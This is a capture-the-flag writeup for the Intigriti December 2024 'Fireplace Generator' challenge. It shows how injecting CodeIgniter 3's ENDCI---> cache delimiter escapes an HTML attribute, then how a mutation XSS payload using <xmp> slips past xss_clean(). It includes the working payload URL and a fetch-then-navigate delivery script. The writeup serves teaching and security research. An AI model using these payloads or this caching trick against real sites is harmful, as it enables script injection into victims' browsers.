1224: Fireplace Generator

Writeup for the Intigriti December 2024 challenge 💥

Challenge Description

Find the FLAG and win Intigriti swag! 🏆

Summary

Inject the special ENDCI---> cache format delimiter to cut off the start of the response up to a point inside the id= attribute. This gets you out of the attribute.
Bypass the xss_clean() function using a Mutation XSS with the allowed xmp tag: <xmp><p id='</xmp><style/onload=alert(origin)>'>

Official Writeup (by Jorian)

Visiting the challenge URL, we find a simple form with a single input to "generate a fireplace". The bottom right also shows a button to download the source code of the application.

We can try to input something and press "Ignite!", which takes us to a /view page with a ?title= parameter. The HTML source shows that our input ended up in two places, the main <h1> header and an id= attribute.

The source code allows us to run it locally making it easier to debug and understand the backend logic. After unzipping, we can start it with the following command:

docker compose up --build

Then, it should be accessible on http://localhost:8000. The source code leaves traces of "CodeIgniter", specifically version 3 (https://github.com/bcit-ci/CodeIgniter). The history of the source code is tracked by Git, so we can find which files were added or changed:

git diff HEAD --diff-filter=d

This reveals a small config change:

-$config['cache_query_string'] = FALSE;
+$config['cache_query_string'] = TRUE;

Along with the source code of application/controllers/View.php:

function str2id($str)
{
    if (strstr($str, '"')) {
        die('Error: No quotes allowed in attribute');
    }
    // Lowercase everything except first letters
    $str = preg_replace_callback('/(^)?[A-Z]+/', function($match) {
        return isset($match[1]) ? $match[0] : strtolower($match[0]);
    }, $str);
    // Replace whitespace with dash
    return preg_replace('/[\s]/', '-', $str);
}

class View extends CI_Controller
{
    public function index()
    {
        $this->load->helper('string');
        $this->load->helper('security');
        $this->output->cache(1);

        $title = $this->input->get('title') ?: 'Christmas Fireplace';

        $title = xss_clean($title);
        $id = str2id($title);

        $this->load->view('view', array(
            "id" => $id,
            "title" => $title
        ));
    }
}

This renders a template named view, found in application/views/view.php:

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <link rel="stylesheet" href="/style.css" />
    </head>

    <body background="#483741" class="fire-border">
        <a href="/" class="top-left">⬅ Go back</a>
        <div class="wrapper">
            <h1><?= htmlspecialchars($title) ?></h1>
            ...
            <div class="fireplace" id="<?= $id ?>">
                <div class="bottom">...</div>
            </div>
        </div>
    </body>
</html>

From this, we can gather that we have one input, the title= query parameter. The xss_clean() function transforms our input, and then an ID is made of the string using the custom str2id() function. Finally, the $title variable is displayed safely using htmlspecialchars() while the $id variable is not escaped. However, we cannot use a quote (") character to break out of the id= attribute because of the strstr($str, '"') check.
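To experiment with str2id() without running PHP, the function can be approximated in Python. This is a rough port for illustration, not the challenge code: the ValueError stands in for die(), the "match starts at offset 0" check stands in for the optional (^) group, and re.ASCII is assumed to be close enough to PCRE's \s for the inputs used here.

```python
import re


def str2id(s: str) -> str:
    """Approximate Python port of the challenge's PHP str2id()."""
    if '"' in s:
        # PHP calls die() here; an exception is the closest Python analogue.
        raise ValueError("Error: No quotes allowed in attribute")

    def lower_unless_at_start(m):
        # In the PHP version the optional (^) group is only set when the run
        # of capitals begins at offset 0, so that run is left untouched.
        return m.group(0) if m.start() == 0 else m.group(0).lower()

    s = re.sub(r"[A-Z]+", lower_unless_at_start, s)
    # Replace every whitespace character with a dash.
    return re.sub(r"\s", "-", s, flags=re.ASCII)


print(str2id("Christmas Fireplace"))  # Christmas-fireplace
print(str2id("<u>test"))              # <u>test
```

Note that angle brackets pass through untouched; only double quotes are rejected.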

We can quickly check what happens if our input contains the special < and > characters:

http://localhost:8000/index.php/view?title=%3Cu%3Etest

<!DOCTYPE html><html lang="en">...
<h1>&lt;u&gt;test</h1>...<div class="fireplace" id="<u>test">...</body></html>

Clearly, the $title variable was HTML-encoded, but the $id variable is output without encoding and still shows the raw <> characters. We cannot yet escape the attribute due to " being blocked, but it is something to keep in mind.

Caching

You may also notice the line $this->output->cache(1);. Combined with the change to the caching configuration, this may be interesting. The feature is documented in the CodeIgniter user guide and implemented in system/core/Output.php. The _display_cache() function defined there is called for every request. The code can be summarized as follows:

public function _display_cache(&$CFG, &$URI) {
    ...
    $filepath = $cache_path.md5($uri);
    if ( ! file_exists($filepath) OR ! $fp = @fopen($filepath, 'rb')) {
        return FALSE;
    }

    flock($fp, LOCK_SH);
    $cache = (filesize($filepath) > 0) ? fread($fp, filesize($filepath)) : '';
    flock($fp, LOCK_UN);
    fclose($fp);

    // Look for embedded serialized file info.
    if ( ! preg_match('/^(.*)ENDCI--->/', $cache, $match)) {
        return FALSE;
    }

    $cache_info = unserialize($match[1]);
    $expire = $cache_info['expire'];
    ...

    // Display the cache
    $this->_display(self::substr($cache, self::strlen($match[0])));
    return TRUE;
}

First, it calculates a cache path from the current URI, which in our case is the path and query parameters. If this file doesn't exist, the request isn't cached and a new response is generated as normal. If the file does exist, it is read, and the RegEx /^(.*)ENDCI--->/ is used to find the separator between the serialized cache info and the response data itself.

We can find these files locally by entering the Docker container after having generated a /view response:

$ docker compose exec -it web bash

root@06c66a7cc410:/var/www/html# cd application/cache
root@06c66a7cc410:/var/www/html/application/cache# ls -l
total 4
-rw-r----- 1 www-data www-data 1999 Nov 24 19:42 301b4f7c17e8d246d49e42ac03a32503
root@06c66a7cc410:/var/www/html/application/cache# cat 301b4f7c17e8d246d49e42ac03a32503

a:2:{s:6:"expire";i:1732477403;s:7:"headers";a:0:{}}ENDCI---><!DOCTYPE html><html lang="en">...
<h1>YOUR INPUT</h1>...<div class="fireplace" id="YOUR-INPUT">...</body></html>

So there is a special delimiter, ENDCI--->, that separates the serialized cache info from the HTML body. This HTML body contains our input, so the cache file contains it too, in plain text. What if we put the string "ENDCI--->" in our input? Will the parser get confused and use our delimiter?

http://localhost:8000/index.php/view?title=ENDCI---%3E

<!DOCTYPE html><html lang="en">...
<h1>ENDCI---&amp;gt;</h1>...<div class="fireplace" id="ENDCI---&gt;">...</body></html>

For some reason, the > is now encoded in the id= attribute and even double-encoded in the <h1>, while previously the <> characters worked fine. After some investigating, we find that the root cause is in the xss_clean() function. It contains an array named $_never_allowed_str, which includes a mapping from --> to --&gt;. Our input contains this sequence, so it is replaced. The function _do_never_allowed() is called right before returning and ensures that these strings are always replaced in the "safe" content.
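The double encoding can be reproduced with a small sketch. It models only the single --> entry of $_never_allowed_str described above, not the rest of xss_clean(), and uses Python's html.escape() as a stand-in for PHP's htmlspecialchars(). The helper name never_allowed is hypothetical.

```python
import html


def never_allowed(s: str) -> str:
    # Models one entry of CodeIgniter's $_never_allowed_str: "-->" => "--&gt;".
    return s.replace("-->", "--&gt;")


title = never_allowed("ENDCI--->")
print(title)               # ENDCI---&gt;      (what reaches the id= attribute)
print(html.escape(title))  # ENDCI---&amp;gt;  (what reaches the <h1>)
```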

In our case, this is not the final string being output, because $id is put through the str2id() function after xss_clean(). Conveniently, str2id() replaces all whitespace with dashes (-), and the string we want to smuggle through contains dashes. This means we can replace the dashes in ENDCI---> with spaces, like ENDCI   >, which the XSS filter no longer recognizes but which str2id() transforms into ENDCI---> again:

http://localhost:8000/index.php/view?title=ENDCI%20%20%20%3E

<!DOCTYPE html><html lang="en">...
<h1>ENDCI   &gt;</h1>...<div class="fireplace" id="ENDCI--->">...</body></html>

This seems to have worked. The file is generated and its cache entry now looks like this:

a:2:{s:6:"expire";i:1732478903;s:7:"headers";a:0:{}}ENDCI---><!DOCTYPE html><html lang="en">...
<h1>ENDCI   &gt;</h1>...<div class="fireplace" id="ENDCI--->">...</body></html>
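Why the spaces survive comes down to the order of operations in the controller: the filter runs first, and the whitespace replacement runs afterwards. A minimal sketch of that ordering, assuming only the --> replacement and the final line of str2id() matter for this input (all three function names are hypothetical):

```python
import re


def never_allowed(s: str) -> str:
    # Models only the "-->" => "--&gt;" entry of $_never_allowed_str.
    return s.replace("-->", "--&gt;")


def spaces_to_dashes(s: str) -> str:
    # Models only the last line of str2id(): whitespace becomes "-".
    return re.sub(r"\s", "-", s)


def make_id(title: str) -> str:
    # Same order as the controller: filter first, then build the id.
    return spaces_to_dashes(never_allowed(title))


print(make_id("ENDCI--->"))  # ENDCI---&gt;  (delimiter destroyed by the filter)
print(make_id("ENDCI   >"))  # ENDCI--->     (delimiter rebuilt after the filter)
```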

Now there are two ENDCI---> delimiters, so which one will preg_match() pick? We can quickly find out by force-reloading the page.

We certainly seem to have broken the page. Checking the source code shows not much is left of our payload:

"><div class="bottom">...</body></html>

So what happened? Regular Expressions are "greedy" by default, meaning they try to match as long a string as possible. The .* therefore looks past the first ENDCI---> to find the second one in our payload and uses that, because it produces a longer match. Note that . matches all characters except newlines, because the PCRE_DOTALL (s) flag was not given. In our case, the views are minified to not contain newlines, so we can inject our payload into the first line. The PHP unserialize() function also receives some garbage after its serialized object, but luckily the } end marker stops its parsing and it doesn't care about the HTML body after it.
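The greedy behaviour is easy to check in isolation. The sketch below uses Python's re module, whose . also excludes newlines by default, on an abbreviated cache file assembled from the snippets above (the "..." parts are elisions, not real content). The lazy variant is included only for contrast and is not what CodeIgniter uses.

```python
import re

# Abbreviated shape of the cache file after requesting ?title=ENDCI%20%20%20%3E
cache = (
    'a:2:{s:6:"expire";i:1732478903;s:7:"headers";a:0:{}}ENDCI--->'
    '<!DOCTYPE html><html lang="en">...'
    '<h1>ENDCI   &gt;</h1>...<div class="fireplace" id="ENDCI--->">'
    '<div class="bottom">...</body></html>'
)

greedy = re.match(r"(.*)ENDCI--->", cache)   # same shape as CodeIgniter's pattern
lazy = re.match(r"(.*?)ENDCI--->", cache)    # hypothetical non-greedy variant

# Everything after the matched prefix is what would be sent as the body.
greedy_body = cache[len(greedy.group(0)):]
lazy_body = cache[len(lazy.group(0)):]

print(greedy_body)       # "><div class="bottom">...</body></html>
print(lazy_body[:15])    # <!DOCTYPE html>
```

With the greedy pattern the body starts right after the injected delimiter, inside what used to be the id= attribute.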

This means we can now throw out the whole start of the HTML body, including the opening of the attribute. We are now in HTML context and can directly write HTML:

http://localhost:8000/index.php/view?title=ENDCI%20%20%20%3E%3Cu%3Etest

<u>test">...</u>

If we try to write an XSS payload now, however, we can see that it is still sanitized by xss_clean():

http://localhost:8000/index.php/view?title=ENDCI%20%20%20%3E%3Cimg%20src%20onerror=alert(origin)%3E

<img />">...

xss_clean() bypass

Now that we can directly write HTML, we should take a look at the xss_clean() function and see how it blocks malicious inputs. Reading the code, we can see that it performs a few steps:

1. Remove control characters
2. URL-decode and HTML-decode recursively
3. Remove 'never allowed' strings from $_never_allowed_str and $_never_allowed_regex
4. HTML-encode <? and ?> tags
5. Remove spaces between certain words like "javascript" or "alert"
6. Remove javascript: protocol from a and img tags, and remove "script" and "xss" strings
7. Parse string as HTML with tags and attributes with RegEx. _sanitize_naughty_html() handles removing dangerous tags and attributes.
8. HTML-encode the parentheses of function calls, turning alert() into alert&#40;&#41;
9. Remove 'never allowed' strings again

These are quite some layers to get through, but the main hurdle is step 7 where dangerous tags and attributes are removed. The list seems quite comprehensive so we cannot just come up with a unique XSS payload.

One thing to notice is that the string is parsed into HTML tags and attributes using a Regular Expression. There is a funny answer on StackOverflow explaining that it is impossible to parse HTML with RegEx. In this case, the RegEx is a complicated combination of a few parts:

$pattern = '#'
    .'<((?<slash>/*\s*)((?<tagName>[a-z0-9]+)(?=[^a-z0-9]|$)|.+)' // tag start and name, followed by a non-tag character
    .'[^\s\042\047a-z0-9>/=]*' // a valid attribute character immediately after the tag would count as a separator
    // optional attributes
    .'(?<attributes>(?:[\s\042\047/=]*' // non-attribute characters, excluding > (tag close) for obvious reasons
    .'[^\s\042\047>/=]+' // attribute characters
    // optional attribute-value
        .'(?:\s*=' // attribute-value separator
            .'(?:[^\s\042\047=><`]+|\s*\042[^\042]*\042|\s*\047[^\047]*\047|\s*(?U:[^\s\042\047=><`]*))' // single, double or non-quoted value
        .')?' // end optional attribute-value group
    .')*)' // end optional attributes group
    .'[^>]*)(?<closeTag>\>)?#isS';

It reads an opening <, then a tag name, followed by attributes, and finally >. This assumes the whole string is in HTML context, but if you have some experience with Mutation XSS, you may know that there are different contexts inside specific tags. The <title> tag, for example, contains not HTML but Text. That means HTML like the following will close the title tag in what looks to us like an attribute, and open the <img> tag:

<title><p id="</title><img src onerror="alert()" />">


The RegEx that xss_clean() uses would see this as just a <title> tag and a <p> tag with an attribute; it would not find the <img> tag. Unfortunately, the title tag specifically is part of the $naughty_tags list, whose entries are removed. But more tags get parsed as text, such as:

style, script, xmp, iframe, noembed, noframes, plaintext, noscript, title and textarea

Comparing this with the list of denied tags, we can find a few that are not blocked:

>>> denied = {'blink', 'area', 'input', 'isindex', 'select', 'form', 'bgsound', 'expression', 'layer', 'iframe', 'behavior', 'style', 'audio', 'body', 'applet', 'object', 'xss', 'button', 'embed', 'html', 'math', 'video', 'base', 'confirm', 'plaintext', 'basefont', 'frame', 'xml', 'head', 'script', 'keygen', 'textarea', 'prompt', 'link', 'title', 'meta', 'svg', 'ilayer', 'alert', 'frameset'}
>>> working = {'style', 'script', 'xmp', 'iframe', 'noembed', 'noframes', 'plaintext', 'noscript', 'title', 'textarea'}

>>> working - denied
{'xmp', 'noembed', 'noscript', 'noframes'}

We can use any of these like <xmp> in our payload to confuse the parser. By writing a tag-looking string inside of the xmp content we can hide a closing </xmp> tag inside its attribute and then immediately start an arbitrary tag for XSS.

<xmp><p id="</xmp><style onload=alert(origin)>">
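The mismatch between the filter's view and the browser's view can be sketched as follows. The pattern here is a deliberately simplified tag matcher, not CodeIgniter's actual expression, and markup_after_raw_text() is a hypothetical helper that only imitates one browser rule: the content of <xmp> is text, so the element ends at the first </xmp>. The single-quoted form of the payload is used.

```python
import re

# Simplified tag matcher: "<", a tag name, then anything up to ">" where
# quoted attribute values are skipped as a unit. NOT CodeIgniter's pattern.
TAG = re.compile(r"""<\s*/?\s*([a-z0-9]+)(?:[^>'"]|'[^']*'|"[^"]*")*>""", re.I)


def tags_seen_by_regex(markup: str) -> list:
    # Tag names a quote-aware regex would report, in order.
    return [m.group(1).lower() for m in TAG.finditer(markup)]


def markup_after_raw_text(markup: str, tag: str) -> str:
    # Imitates the browser: the raw-text element ends at the first closing
    # tag, even if that closing tag sits inside something quote-like.
    lowered = markup.lower()
    start = lowered.index("<" + tag + ">") + len(tag) + 2
    end = lowered.index("</" + tag + ">", start)
    return markup[end + len(tag) + 3:]


payload = "<xmp><p id='</xmp><style/onload=alert(origin)>'>"
print(tags_seen_by_regex(payload))            # ['xmp', 'p']
print(markup_after_raw_text(payload, "xmp"))  # <style/onload=alert(origin)>'>
```

The regex never reports a style tag, while the markup left over after the xmp element starts with one.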

Note that we still cannot use double quote (") characters, so we should use a single quote (') to open the attribute. We also can't use spaces in the eventual XSS payload because str2id() replaces them, so we can use / as an alternative attribute separator. Combined with the ENDCI---> prefix that lets us write HTML in the first place, our final payload becomes:

http://localhost:8000/index.php/view?title=ENDCI%20%20%20%3E%3Cxmp%3E%3Cp%20id=%27%3C/xmp%3E%3Cstyle/onload=alert(origin)%3E%27%3E

ENDCI   ><xmp><p id='</xmp><style/onload=alert(origin)>'>

The response to this request after the 2nd reload is:

<xmp><p-id='</xmp><style/onload=alert&#40;origin&#41;>'>">...

Even though the alert() call is HTML-encoded, it is put into an attribute, which makes the browser decode it for us! This triggers the XSS.
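The decoding step can be illustrated with Python's html.unescape(), used here as a stand-in for the character reference resolution an HTML parser applies to attribute values:

```python
import html

attribute_source = "alert&#40;origin&#41;"

# Character references in an attribute value are resolved by the HTML
# parser before the value is handed to the script engine.
decoded = html.unescape(attribute_source)
print(decoded)  # alert(origin)
```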

Final Payload

To consistently deliver this payload to a victim, we need to cache the URL server-side before visiting it, but make sure it is not cached client-side because then another request wouldn't be sent. We can achieve this through a simple cross-origin fetch() to the URL before navigating the full page to it:

<script>
    const HOST = "http://localhost:8000";

    const payload = `ENDCI   ><xmp><p id='</xmp><style/onload=alert(origin)>'>`;
    const url = HOST + "/index.php/view?" + new URLSearchParams({ title: payload });

    (async () => {
        // Cache it on the server-side, not client-side
        await fetch(url, {
            mode: "no-cors",
        });
        // Then visit the page
        location = url;
    })();
</script>
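To inspect the URL that this script builds without opening a browser, the same form encoding can be reproduced with Python's urllib.parse. This is only a convenience sketch: HOST is the local Docker address used throughout this writeup, and urlencode() is assumed to be close enough to URLSearchParams for this payload (both encode spaces as +).

```python
from urllib.parse import parse_qs, urlencode, urlsplit

HOST = "http://localhost:8000"  # local Docker instance from this writeup
payload = "ENDCI   ><xmp><p id='</xmp><style/onload=alert(origin)>'>"

# urlencode() applies form encoding, so the three spaces become "+++".
url = HOST + "/index.php/view?" + urlencode({"title": payload})
print(url)

# Decoding the query string again should give back the exact payload.
round_trip = parse_qs(urlsplit(url).query)["title"][0]
print(round_trip == payload)  # True
```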

Community Writeups
